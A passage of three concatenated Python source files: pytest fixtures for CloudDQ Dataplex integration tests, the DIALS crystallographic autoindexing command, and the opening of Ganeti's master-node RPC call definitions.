gcp_impersonation_credentials = os.environ.get('IMPERSONATION_SERVICE_ACCOUNT', None)
if not gcp_impersonation_credentials:
logger.warning("Test environment variable IMPERSONATION_SERVICE_ACCOUNT "
"cannot be found. Set this to the service account name for impersonation "
"used for integration testing. The tests will proceed skipping all tests "
"involving service-account impersonation.")
if os.environ["IMPERSONATION_SERVICE_ACCOUNT"]:
del os.environ["IMPERSONATION_SERVICE_ACCOUNT"]
return gcp_impersonation_credentials
@pytest.fixture(scope="session")
def gcs_bucket_name():
gcs_bucket_name = os.environ.get('GCS_BUCKET_NAME', None)
if not gcs_bucket_name:
logger.fatal("Required test environment variable GCS_BUCKET_NAME "
"cannot be found. Set this to the GCS bucket name for staging "
"CloudDQ artifacts and configs.")
return gcs_bucket_name
@pytest.fixture(scope="session")
def gcs_clouddq_executable_path():
gcs_clouddq_executable_path = os.environ.get('GCS_CLOUDDQ_EXECUTABLE_PATH', None)
if not gcs_clouddq_executable_path:
logger.warning(
"Test environment variable GCS_CLOUDDQ_EXECUTABLE_PATH cannot be found. "
"Set this to the GCS bucket path for the pre-built CloudDQ file "
"`clouddq-executable.zip` and `clouddq-executable.zip.hashsum`. "
"If this is not set or empty, the test harness will look the the zip executable called "
"`clouddq_patched.zip` on local path and upload it to $GCS_BUCKET_NAME for testing.")
return gcs_clouddq_executable_path
@pytest.fixture(scope="session")
def gcp_dataplex_region():
gcp_dataplex_region = os.environ.get('DATAPLEX_REGION_ID', None)
if not gcp_dataplex_region:
logger.warning("Required test environment variable DATAPLEX_REGION_ID "
"cannot be found. Set this to the region id of the Dataplex Lake.")
# Todo: remove this once test fixture for creating dataplex entities is complete
test_region_id = "us-central1"
logging.warning(f"Defaulting to using test: {test_region_id}")
gcp_dataplex_region = test_region_id
return gcp_dataplex_region
@pytest.fixture(scope="session")
def gcp_dataplex_lake_name():
gcp_dataplex_lake_name = os.environ.get('DATAPLEX_LAKE_NAME', None)
if not gcp_dataplex_lake_name:
logger.fatal("Required test environment variable DATAPLEX_LAKE_NAME "
"cannot be found. Set this to the Dataplex Lake used for testing.")
# Todo: remove this once test fixture for creating dataplex entities is complete
test_lake_name = "amandeep-dev-lake"
logging.warning(f"Defaulting to using test: {test_lake_name}")
gcp_dataplex_lake_name = test_lake_name
return gcp_dataplex_lake_name
@pytest.fixture(scope="session")
def dataplex_endpoint():
dataplex_endpoint = os.environ.get('DATAPLEX_ENDPOINT', None)
if not dataplex_endpoint:
logger.warning("Required test environment variable DATAPLEX_ENDPOINT "
"cannot be found. Defaulting to the Dataplex Endpoint "
"'https://dataplex.googleapis.com'.")
dataplex_endpoint = "https://dataplex.googleapis.com"
return dataplex_endpoint
@pytest.fixture(scope="session")
def target_bq_result_dataset_name():
target_bq_result_dataset_name = os.environ.get('DATAPLEX_TARGET_BQ_DATASET', None)
if not target_bq_result_dataset_name:
logger.fatal("Required test environment variable DATAPLEX_TARGET_BQ_DATASET "
"cannot be found. Set this to the Target BQ Dataset used for testing.")
return target_bq_result_dataset_name
@pytest.fixture(scope="session")
def target_bq_result_table_name():
target_bq_result_table_name = os.environ.get('DATAPLEX_TARGET_BQ_TABLE', None)
if not target_bq_result_table_name:
logger.fatal("Required test environment variable DATAPLEX_TARGET_BQ_TABLE "
"cannot be found. Set this to the Target BQ Table used for testing.")
return target_bq_result_table_name
@pytest.fixture(scope="session")
def dataplex_task_service_account_name():
dataplex_task_service_account_name = os.environ.get('DATAPLEX_TASK_SA', None)
if not dataplex_task_service_account_name:
logger.fatal("Required test environment variable DATAPLEX_TASK_SA "
"cannot be found. Set this to the service account used for "
"running Dataplex Tasks in testing.")
return dataplex_task_service_account_name
@pytest.fixture(scope="session")
def gcp_dataplex_zone_id():
gcp_dataplex_zone_id = os.environ.get('DATAPLEX_ZONE_ID', None)
if not gcp_dataplex_zone_id:
logger.warning("Required test environment variable DATAPLEX_ZONE_ID cannot be found. "
"Set this to the Dataplex Zone used for testing.")
test_zone_id = "raw"
logging.warning(f"Defaulting to using test: {test_zone_id}")
gcp_dataplex_zone_id = test_zone_id
return gcp_dataplex_zone_id
@pytest.fixture(scope="session")
def gcp_dataplex_bucket_name():
gcp_dataplex_bucket_name = os.environ.get('DATAPLEX_BUCKET_NAME', None)
if not gcp_dataplex_bucket_name:
logger.warning("Required test environment variable DATAPLEX_BUCKET_NAME cannot be found. "
"Set this to the Dataplex gcs assets bucket name used for testing.")
# Todo: remove this once test fixture for creating dataplex entities is complete
test_bucket_name = "amandeep-dev-bucket"
logging.warning(f"Defaulting to using test: {test_bucket_name}")
gcp_dataplex_bucket_name = test_bucket_name
return gcp_dataplex_bucket_name
@pytest.fixture(scope="session")
def gcp_dataplex_bigquery_dataset_id():
gcp_dataplex_bigquery_dataset_id = os.environ.get('DATAPLEX_BIGQUERY_DATASET_ID', None)
if not gcp_dataplex_bigquery_dataset_id:
logger.fatal("Required test environment variable DATAPLEX_BIGQUERY_DATASET_ID cannot be found. "
"Set this to the Dataplex bigquery assets dataset id used for testing.")
# Todo: remove this once test fixture for creating dataplex entities is complete
test_dataset_id = "clouddq_test_asset_curated"
logging.warning(f"Defaulting to using test: {test_dataset_id}")
gcp_dataplex_bigquery_dataset_id = test_dataset_id
return gcp_dataplex_bigquery_dataset_id
@pytest.fixture(scope="session")
def test_dq_dataplex_client(dataplex_endpoint,
gcp_dataplex_lake_name,
gcp_dataplex_region,
gcp_project_id,
gcs_bucket_name):
gcp_project_id = gcp_project_id
gcs_bucket_name = gcs_bucket_name
yield CloudDqDataplexClient(dataplex_endpoint=dataplex_endpoint,
gcp_dataplex_lake_name=gcp_dataplex_lake_name,
gcp_dataplex_region=gcp_dataplex_region,
gcp_project_id=gcp_project_id,
gcs_bucket_name=gcs_bucket_name)
@pytest.fixture(scope="session")
def test_bigquery_client():
"""Get BigQuery Client using discovered ADC"""
client = BigQueryClient()
yield client
client.close_connection()
@pytest.fixture(scope="session")
def test_dataplex_metadata_defaults_configs(
gcp_dataplex_lake_name,
gcp_dataplex_region,
gcp_project_id,
gcp_dataplex_zone_id,):
dataplex_metadata_defaults = {
"projects": gcp_project_id,
"locations": gcp_dataplex_region,
"lakes": gcp_dataplex_lake_name,
"zones": gcp_dataplex_zone_id,
}
return dataplex_metadata_defaults
@pytest.fixture(scope="session")
def test_resources():
return Path("tests").joinpath("resources").absolute()
@pytest.fixture(scope="session")
def test_data():
return Path("tests").joinpath("data").absolute()
@pytest.fixture(scope="session")
def source_configs_path():
return Path("tests").joinpath("resources", "configs").absolute()
@pytest.fixture(scope="session")
def source_configs_file_path():
return Path("tests").joinpath("resources").joinpath("configs.yml").absolute()
@pytest.fixture(scope="session")
def source_dq_rules_configs_file_path():
return Path("tests").joinpath("resources").joinpath("dq_rules_configs.yml").absolute()
@pytest.fixture(scope="session")
def source_dq_advanced_rules_configs_path():
return Path("docs").joinpath("examples").joinpath("advanced_rules").absolute()
@pytest.fixture(scope="session")
def test_profiles_dir():
return Path("tests").joinpath("resources", "test_dbt_profiles_dir").absolute()
@pytest.fixture(scope="function")
def test_configs_cache(
source_configs_path,
tmp_path):
temp_path = Path(tmp_path).joinpath("clouddq_test_configs_cache")
temp_path.mkdir()
with working_directory(temp_path):
configs_cache = prepare_configs_cache(configs_path=source_configs_path)
yield configs_cache
@pytest.fixture(scope="function")
def test_default_dataplex_configs_cache(temp_configs_dir,
test_dq_dataplex_client,
test_dataplex_metadata_defaults_configs,
tmp_path,
test_bigquery_client):
temp_path = Path(tmp_path).joinpath("clouddq_test_configs_cache")
temp_path.mkdir()
with working_directory(temp_path):
configs_cache = prepare_configs_cache(configs_path=temp_configs_dir)
target_rule_binding_ids = [
row["id"] for row in
configs_cache._cache_db.query("select id from rule_bindings")
]
configs_cache.resolve_dataplex_entity_uris(
client=test_dq_dataplex_client,
bigquery_client=test_bigquery_client,
default_configs=test_dataplex_metadata_defaults_configs,
target_rule_binding_ids=target_rule_binding_ids
)
yield configs_cache
@pytest.fixture(scope="function")
def temp_configs_dir(
gcp_project_id,
gcp_dataplex_bigquery_dataset_id,
gcp_dataplex_region,
gcp_dataplex_lake_name,
gcp_dataplex_zone_id,
source_configs_path,
tmp_path):
# Create temp directory
temp_clouddq_dir = Path(tmp_path).joinpath("clouddq_test_artifacts")
# Copy over tests/resources/configs
configs_path = Path(temp_clouddq_dir).joinpath("configs")
_ = shutil.copytree(source_configs_path, configs_path)
# Prepare test config
test_data = configs_path.joinpath("entities", "test-data.yml")
with open(test_data) as source_file:
lines = source_file.read()
with open(test_data, "w") as source_file:
lines = lines.replace("<your_gcp_project_id>", gcp_project_id)
lines = lines.replace("<your_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
# Prepare metadata_registry_default_configs
registry_defaults = configs_path.joinpath("metadata_registry_defaults.yml")
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
source_file.write(lines)
# Prepare entity_uri configs
registry_defaults = configs_path.joinpath("rule_bindings", "team-4-rule-bindings.yml")
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
# prepare gcs entity_uri configs
registry_defaults = configs_path.joinpath("rule_bindings", "team-5-rule-bindings.yml")
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
# prepare partitioned gcs entity_uri configs
registry_defaults = configs_path.joinpath("rule_bindings", "team-6-rule-bindings.yml")
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
# prepare bq native entity_uri configs
registry_defaults = configs_path.joinpath("rule_bindings", "team-7-rule-bindings.yml")
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
# prepare partitioned bq native entity_uri configs
registry_defaults = configs_path.joinpath("rule_bindings", "team-8-rule-bindings.yml")
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
yield configs_path.absolute()
if os.path.exists(temp_clouddq_dir):
shutil.rmtree(temp_clouddq_dir)
@pytest.fixture(scope="function")
def temp_configs_from_file(
gcp_project_id,
gcp_dataplex_bigquery_dataset_id,
gcp_dataplex_region,
gcp_dataplex_lake_name,
gcp_dataplex_zone_id,
source_configs_file_path,
tmp_path):
# Create temp directory
temp_clouddq_dir = Path(tmp_path).joinpath("clouddq_test_configs")
# Copy over tests/resources/configs
registry_defaults = shutil.copyfile(source_configs_file_path, temp_clouddq_dir)
# Prepare entity_uri configs
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
yield temp_clouddq_dir.absolute()
if os.path.exists(temp_clouddq_dir):
os.unlink(temp_clouddq_dir)
@pytest.fixture(scope="function")
def test_default_dataplex_configs_cache_from_file(temp_configs_from_file,
test_dq_dataplex_client,
test_dataplex_metadata_defaults_configs,
tmp_path,
test_bigquery_client,):
temp_path = Path(tmp_path).joinpath("clouddq_test_configs_cache")
temp_path.mkdir()
with working_directory(temp_path):
configs_cache = prepare_configs_cache(configs_path=temp_configs_from_file)
target_rule_binding_ids = [
row["id"] for row in
configs_cache._cache_db.query("select id from rule_bindings")
]
configs_cache.resolve_dataplex_entity_uris(
client=test_dq_dataplex_client,
bigquery_client=test_bigquery_client,
default_configs=test_dataplex_metadata_defaults_configs,
target_rule_binding_ids=target_rule_binding_ids
)
yield configs_cache
@pytest.fixture(scope="function")
def temp_configs_from_dq_rules_config_file(
gcp_project_id,
gcp_dataplex_bigquery_dataset_id,
gcp_dataplex_region,
gcp_dataplex_lake_name,
gcp_dataplex_zone_id,
source_dq_rules_configs_file_path,
tmp_path):
# Create temp directory
temp_clouddq_dir = Path(tmp_path).joinpath("clouddq_test_dq_rules_configs")
# Copy over tests/resources/configs
registry_defaults = shutil.copyfile(source_dq_rules_configs_file_path, temp_clouddq_dir)
# Prepare entity_uri configs
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
yield temp_clouddq_dir.absolute()
if os.path.exists(temp_clouddq_dir):
os.unlink(temp_clouddq_dir)
@pytest.fixture(scope="function")
def temp_configs_from_dq_advanced_rules_configs(
gcp_project_id,
gcp_dataplex_bigquery_dataset_id,
gcp_dataplex_region,
gcp_dataplex_lake_name,
gcp_dataplex_zone_id,
source_dq_advanced_rules_configs_path,
tmp_path):
# Create temp directory
temp_clouddq_dir = Path(tmp_path).joinpath("clouddq_test_dq_advanced_rules_configs")
# Copy over docs/examples/docs/advanced_rules
registry_defaults = shutil.copytree(source_dq_advanced_rules_configs_path, temp_clouddq_dir)
# Prepare entity_uri configs
for root, _, files in os.walk(registry_defaults):
for file in files:
if '.yaml' in file or '.yml' in file:
source_filename = os.path.join(root, file)
with open(source_filename) as source_file:
lines = source_file.read()
with open(source_filename, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
lines = lines.replace("<my_bigquery_input_data_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
yield temp_clouddq_dir.absolute()
if os.path.exists(temp_clouddq_dir):
shutil.rmtree(temp_clouddq_dir)
@pytest.fixture(scope="session")
def runner():
return click.testing.CliRunner()
def pytest_configure(config):
config.addinivalue_line("markers", "dataplex: mark as tests for dataplex integration test.")
def pytest_addoption(parser):
parser.addoption(
"--run-dataplex", action="store_true", default=False, help="run dataplex integraiton tests"
)
def pytest_collection_modifyitems(config, items):
if config.getoption("--run-dataplex"):
return
skip_dataplex = pytest.mark.skip(reason="need --run_dataplex option to run")
for item in items:
if "dataplex" in item.keywords:
item.add_marker(skip_dataplex)
|
|
# DIALS_ENABLE_COMMAND_LINE_COMPLETION
from __future__ import annotations
import concurrent.futures
import copy
import logging
import sys
import iotbx.phil
from dxtbx.model.experiment_list import ExperimentList
from dials.algorithms.indexing import DialsIndexError, indexer
from dials.array_family import flex
from dials.util import log, show_mail_handle_errors
from dials.util.options import ArgumentParser, reflections_and_experiments_from_files
from dials.util.slice import slice_reflections
from dials.util.version import dials_version
logger = logging.getLogger("dials.command_line.index")
help_message = """
This program attempts to perform autoindexing on strong spots output by the
program dials.find_spots. The program is called with a "imported.expt" file
(as generated by dials.import) and a "strong.refl" file (as generated by
dials.find_spots). If one or more lattices are identified given the input
list of strong spots, then the crystal orientation and experimental geometry
are refined to minimise the differences between the observed and predicted
spot centroids. The program will output an "indexed.expt" file which
is similar to the input "imported.expt" file, but with the addition of the
crystal model(s), and an "indexed.refl" file which is similar to the input
"strong.refl" file, but with the addition of miller indices and predicted
spot centroids.
dials.index provides both one-dimensional and three-dimensional fast Fourier
transform (FFT) based methods. These can be chosen by setting the parameters
indexing.method=fft1d or indexing.method=fft3d. By default the program searches
for a primitive lattice, and then proceeds with refinement in space group P1.
If the unit_cell and space_group parameters are set, then the program will
only accept solutions which are consistent with these parameters. Space group
constraints will be enforced in refinement as appropriate.
Examples::
dials.index imported.expt strong.refl
dials.index imported.expt strong.refl unit_cell=37,79,79,90,90,90 space_group=P43212
dials.index imported.expt strong.refl indexing.method=fft1d
"""
phil_scope = iotbx.phil.parse(
"""\
include scope dials.algorithms.indexing.indexer.phil_scope
indexing {
include scope dials.algorithms.indexing.lattice_search.basis_vector_search_phil_scope
image_range = None
.help = "Range in images to slice a sequence. The number of arguments"
"must be a factor of two. Each pair of arguments gives a range"
"that follows C conventions (e.g. j0 <= j < j1) when slicing the"
"reflections by observed centroid."
.type = ints(size=2)
.multiple = True
joint_indexing = True
.type = bool
}
include scope dials.algorithms.refinement.refiner.phil_scope
output {
experiments = indexed.expt
.type = path
reflections = indexed.refl
.type = path
log = dials.index.log
.type = str
}
""",
process_includes=True,
)
# override default refinement parameters
phil_overrides = phil_scope.fetch(
source=iotbx.phil.parse(
"""\
refinement {
reflections {
reflections_per_degree=100
}
}
"""
)
)
working_phil = phil_scope.fetch(sources=[phil_overrides])
def _index_experiments(experiments, reflections, params, known_crystal_models=None):
idxr = indexer.Indexer.from_parameters(
reflections,
experiments,
known_crystal_models=known_crystal_models,
params=params,
)
idxr.index()
idx_refl = copy.deepcopy(idxr.refined_reflections)
idx_refl.extend(idxr.unindexed_reflections)
return idxr.refined_experiments, idx_refl
def index(experiments, reflections, params):
"""
Index the input experiments and reflections.
Args:
experiments: The experiments to index
reflections (list): A list of reflection tables containing strong spots
params: An instance of the indexing phil scope
Returns:
(tuple): tuple containing:
experiments: The indexed experiment list
reflections (dials.array_family.flex.reflection_table):
The indexed reflections
Raises:
ValueError: `reflections` is an empty list or `experiments` contains a
combination of sequence and stills data.
dials.algorithms.indexing.DialsIndexError: Indexing failed.
"""
if experiments.crystals()[0] is not None:
known_crystal_models = experiments.crystals()
else:
known_crystal_models = None
if len(reflections) == 0:
raise ValueError("No reflection lists found in input")
elif len(reflections) == 1:
if "imageset_id" not in reflections[0]:
reflections[0]["imageset_id"] = reflections[0]["id"]
elif len(reflections) > 1:
assert len(reflections) == len(experiments)
for i in range(len(reflections)):
reflections[i]["imageset_id"] = flex.int(len(reflections[i]), i)
if i > 0:
reflections[0].extend(reflections[i])
reflections = reflections[0]
if params.indexing.image_range:
reflections = slice_reflections(reflections, params.indexing.image_range)
if len(experiments) == 1 or params.indexing.joint_indexing:
indexed_experiments, indexed_reflections = _index_experiments(
experiments,
reflections,
copy.deepcopy(params),
known_crystal_models=known_crystal_models,
)
else:
indexed_experiments = ExperimentList()
with concurrent.futures.ProcessPoolExecutor(
max_workers=params.indexing.nproc
) as pool:
futures = []
for i_expt, expt in enumerate(experiments):
refl = reflections.select(reflections["imageset_id"] == i_expt)
refl["imageset_id"] = flex.size_t(len(refl), 0)
futures.append(
pool.submit(
_index_experiments,
ExperimentList([expt]),
refl,
copy.deepcopy(params),
known_crystal_models=known_crystal_models,
)
)
tables_list = []
for future in concurrent.futures.as_completed(futures):
try:
idx_expts, idx_refl = future.result()
except Exception as e:
print(e)
else:
if idx_expts is None:
continue
# Update the experiment ids by incrementing by the number of indexed
# experiments already in the list
##FIXME below, is i_expt correct - or should it be the
# index of the 'future'?
idx_refl["imageset_id"] = flex.size_t(idx_refl.size(), i_expt)
tables_list.append(idx_refl)
indexed_experiments.extend(idx_expts)
indexed_reflections = flex.reflection_table.concat(tables_list)
return indexed_experiments, indexed_reflections
@show_mail_handle_errors()
def run(args=None, phil=working_phil):
usage = "dials.index [options] models.expt strong.refl"
parser = ArgumentParser(
usage=usage,
phil=phil,
read_reflections=True,
read_experiments=True,
check_format=False,
epilog=help_message,
)
params, options = parser.parse_args(args=args, show_diff_phil=False)
# Configure the logging
log.config(verbosity=options.verbose, logfile=params.output.log)
logger.info(dials_version())
# Log the diff phil
diff_phil = parser.diff_phil.as_str()
if diff_phil != "":
logger.info("The following parameters have been modified:\n")
logger.info(diff_phil)
reflections, experiments = reflections_and_experiments_from_files(
params.input.reflections, params.input.experiments
)
if len(experiments) == 0:
parser.print_help()
return
try:
indexed_experiments, indexed_reflections = index(
experiments, reflections, params
)
except (DialsIndexError, ValueError) as e:
sys.exit(str(e))
# Save experiments
logger.info("Saving refined experiments to %s", params.output.experiments)
assert indexed_experiments.is_consistent()
indexed_experiments.as_file(params.output.experiments)
# Save reflections
logger.info("Saving refined reflections to %s", params.output.reflections)
indexed_reflections.as_file(filename=params.output.reflections)
if __name__ == "__main__":
run()
|
|
#
#
# Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2014 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""RPC definitions for communication between master and node daemons.
RPC definition fields:
- Name as string
- L{SINGLE} for single-node calls, L{MULTI} for multi-node
- Name resolver option(s), can be callable receiving all arguments in a tuple
- Timeout (e.g. L{constants.RPC_TMO_NORMAL}), or callback receiving all
arguments in a tuple to calculate timeout
- List of arguments as tuples
- Name as string
- Argument kind used for encoding/decoding
- Description for docstring (can be C{None})
- Custom body encoder (e.g. for preparing per-node bodies)
- Return value wrapper (e.g. for deserializing into L{objects}-based objects)
- Short call description for docstring
"""
from ganeti import constants
from ganeti import utils
from ganeti import objects
# Guidelines for choosing timeouts:
# - call used during watcher: timeout of 1min, constants.RPC_TMO_URGENT
# - trivial (but be sure it is trivial)
# (e.g. reading a file): 5min, constants.RPC_TMO_FAST
# - other calls: 15 min, constants.RPC_TMO_NORMAL
# - special calls (instance add, etc.):
# either constants.RPC_TMO_SLOW (1h) or huge timeouts
SINGLE = "single-node"
MULTI = "multi-node"
ACCEPT_OFFLINE_NODE = object()
# Constants for encoding/decoding
(ED_OBJECT_DICT,
ED_OBJECT_DICT_LIST,
ED_INST_DICT,
ED_INST_DICT_HVP_BEP_DP,
ED_NODE_TO_DISK_DICT_DP,
ED_INST_DICT_OSP_DP,
ED_IMPEXP_IO,
ED_FILE_DETAILS,
ED_FINALIZE_EXPORT_DISKS,
ED_COMPRESS,
ED_BLOCKDEV_RENAME,
ED_DISKS_DICT_DP,
ED_MULTI_DISKS_DICT_DP,
ED_SINGLE_DISK_DICT_DP,
ED_NIC_DICT,
ED_DEVICE_DICT) = range(1, 17)
def _Prepare(calls):
"""Converts list of calls to dictionary.
"""
return utils.SequenceToDict(calls)
def _MigrationStatusPostProc(result):
"""Post-processor for L{rpc.node.RpcRunner.call_instance_get_migration_status}
"""
if not result.fail_msg and result.payload is not None:
result.payload = objects.MigrationStatus.FromDict(result.payload)
return result
def _BlockdevFindPostProc(result):
"""Post-processor for L{rpc.node.RpcRunner.call_blockdev_find}.
"""
if not result.fail_msg and result.payload is not None:
result.payload = objects.BlockDevStatus.FromDict(result.payload)
return result
def _BlockdevGetMirrorStatusPostProc(result):
"""Post-processor for call_blockdev_getmirrorstatus.
"""
if not result.fail_msg:
result.payload = map(objects.BlockDevStatus.FromDict, result.payload)
return result
def _BlockdevGetMirrorStatusMultiPreProc(node, args):
"""Prepares the appropriate node values for blockdev_getmirrorstatus_multi.
"""
# there should be only one argument to this RPC, already holding a
# node->disks dictionary, we just need to extract the value for the
# current node
assert len(args) == 1
return [args[0][node]]
def _BlockdevGetMirrorStatusMultiPostProc(result):
"""Post-processor for call_blockdev_getmirrorstatus_multi.
"""
if not result.fail_msg:
for idx, (success, status) in enumerate(result.payload):
if success:
result.payload[idx] = (success, objects.BlockDevStatus.FromDict(status))
return result
def _NodeInfoPreProc(node, args):
"""Prepare the storage_units argument for node_info calls."""
assert len(args) == 2
# The storage_units argument is either a dictionary with one value for each
# node, or a fixed value to be used for all the nodes
if type(args[0]) is dict:
return [args[0][node], args[1]]
else:
return args
def _ImpExpStatusPostProc(result):
"""Post-processor for import/export status.
@rtype: Payload containing list of L{objects.ImportExportStatus} instances
@return: Returns a list of the state of each named import/export or None if
a status couldn't be retrieved
"""
if not result.fail_msg:
decoded = []
for i in result.payload:
if i is None:
decoded.append(None)
continue
decoded.append(objects.ImportExportStatus.FromDict(i))
result.payload = decoded
return result
def _TestDelayTimeout((duration, )):
"""Calculate timeout for "test_delay" RPC.
"""
return int(duration + 5)
_FILE_STORAGE_CALLS = [
("file_storage_dir_create", SINGLE, None, constants.RPC_TMO_FAST, [
("file_storage_dir", None, "File storage directory"),
], None, None, "Create the given file storage directory"),
("file_storage_dir_remove", SINGLE, None, constants.RPC_TMO_FAST, [
("file_storage_dir", None, "File storage directory"),
], None, None, "Remove the given file storage directory"),
("file_storage_dir_rename", SINGLE, None, constants.RPC_TMO_FAST, [
("old_file_storage_dir", None, "Old name"),
("new_file_storage_dir", None, "New name"),
], None, None, "Rename file storage directory"),
]
_STORAGE_CALLS = [
("storage_list", MULTI, None, constants.RPC_TMO_NORMAL, [
("su_name", None, None),
("su_args", None, None),
("name", None, None),
("fields", None, None),
], None, None, "Get list of storage units"),
("storage_modify", SINGLE, None, constants.RPC_TMO_NORMAL, [
("su_name", None, None),
("su_args", None, None),
("name", None, None),
("changes", None, None),
], None, None, "Modify a storage unit"),
("storage_execute", SINGLE, None, constants.RPC_TMO_NORMAL, [
("su_name", None, None),
("su_args", None, None),
("name", None, None),
("op", None, None),
], None, None, "Executes an operation on a storage unit"),
]
_INSTANCE_CALLS = [
("instance_info", SINGLE, None, constants.RPC_TMO_URGENT, [
("instance", None, "Instance name"),
("hname", None, "Hypervisor type"),
("hvparams", None, "Hypervisor parameters"),
], None, None, "Returns information about a single instance"),
("all_instances_info", MULTI, None, constants.RPC_TMO_URGENT, [
("hypervisor_list", None, "Hypervisors to query for instances"),
("all_hvparams", None, "Dictionary mapping hypervisor names to hvparams"),
], None, None,
"Returns information about all instances on the given nodes"),
("instance_list", MULTI, None, constants.RPC_TMO_URGENT, [
("hypervisor_list", None, "Hypervisors to query for instances"),
("hvparams", None, "Hvparams of all hypervisors"),
], None, None, "Returns the list of running instances on the given nodes"),
("instance_reboot", SINGLE, None, constants.RPC_TMO_NORMAL, [
("inst", ED_INST_DICT, "Instance object"),
("reboot_type", None, None),
("shutdown_timeout", None, None),
("reason", None, "The reason for the reboot"),
], None, None, "Returns the list of running instances on the given nodes"),
